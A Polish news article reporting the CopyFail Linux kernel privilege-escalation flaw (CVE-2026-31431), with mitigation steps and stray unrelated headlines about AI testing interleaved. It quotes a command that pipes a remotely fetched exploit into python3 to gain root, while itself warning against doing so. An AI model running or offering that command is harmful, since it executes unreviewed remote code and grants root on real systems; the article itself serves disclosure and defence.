Podatność CVE-2026–31431 dotyka wszystkie systemy Linux po 2017 roku. Kod eksploitacyjny jest już publicznie dostępny, a poprawka wymaga aktualizacji jądra.

Źródło zdjęcia: NieBezpiecznik.pl
Specjaliści od cyberbezpieczeństwa ostrzegają przed krytyczną luką w systemach Linux wydanych po 2017 roku. Podatność nazwana CopyFail (CVE-2026–31431) umożliwia lokalną eskalację uprawnień do roota, a kod eksploitacyjny jest już publicznie dostępny, informuje portal .

CAISI podpisało umowy z Google DeepMind, Microsoft i xAI na testowanie zaawansowanych modeli AI pod kątem bezpieczeństwa narodowego.

Naukowcy stworzyli pierwszy test bezpieczeństwa modeli AI dla zastosowań wojskowych, ujawniając poważne luki w 21 komercyjnych modelach.
Luka została wykryta przez skaner wspomagany sztuczną inteligencją i dotyczy błędu logicznego w kodzie kryptograficznym jądra systemu. Choć jest to podatność lokalna, a nie zdalna, może mieć dramatyczne skutki na środowiskach współdzielonych, takich jak hostingi czy serwery Kubernetes.
Niebezpiecznik udostępnił prosty sposób weryfikacji podatności, jednak ostrzega przed bezmyślnym kopiowaniem kodu z internetu. Test można wykonać poleceniem:
curl https://copy.fail/exp | python3 && su
Jeśli po uruchomieniu pojawi się komunikat uid=0(root), system jest podatny na atak. Jednak eksperci kategorycznie odradzają „pajpowanie” kodu bezpośrednio do terminala bez wcześniejszego przeglądu.
Właściwym podejściem jest najpierw pobranie i przeanalizowanie kodu lokalnie, ewentualnie z pomocą asystenta AI, a dopiero potem jego uruchomienie. Złośliwe strony mogą bowiem serwować różną zawartość przeglądarkom i narzędziom wiersza poleceń (User-Agent cloaking).
Luka wynika z błędu logicznego umożliwiającego niewielkie zapisy w pamięci podręcznej stron (page cache), co może naruszyć integralność binarek setuid, takich jak /usr/bin/su. W praktyce oznacza to możliwość przejęcia kontroli nad systemem przez zwykłego użytkownika.
Najbezpieczniejszym rozwiązaniem jest aktualizacja jądra do wersji zawierającej poprawkę (commit a664bf3d603d). Jeśli aktualizacja nie jest możliwa, można tymczasowo wyłączyć podatny moduł poleceniami:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
Odkrycie tej podatności przez skaner wspomagany AI podkreśla rosnącą rolę sztucznej inteligencji w cyberbezpieczeństwie. CopyFail stanowi poważne zagrożenie szczególnie dla administratorów środowisk wieloużytkownikowych i konteneryzowanych, gdzie eskalacja uprawnień może prowadzić do kompromitacji całej infrastruktury.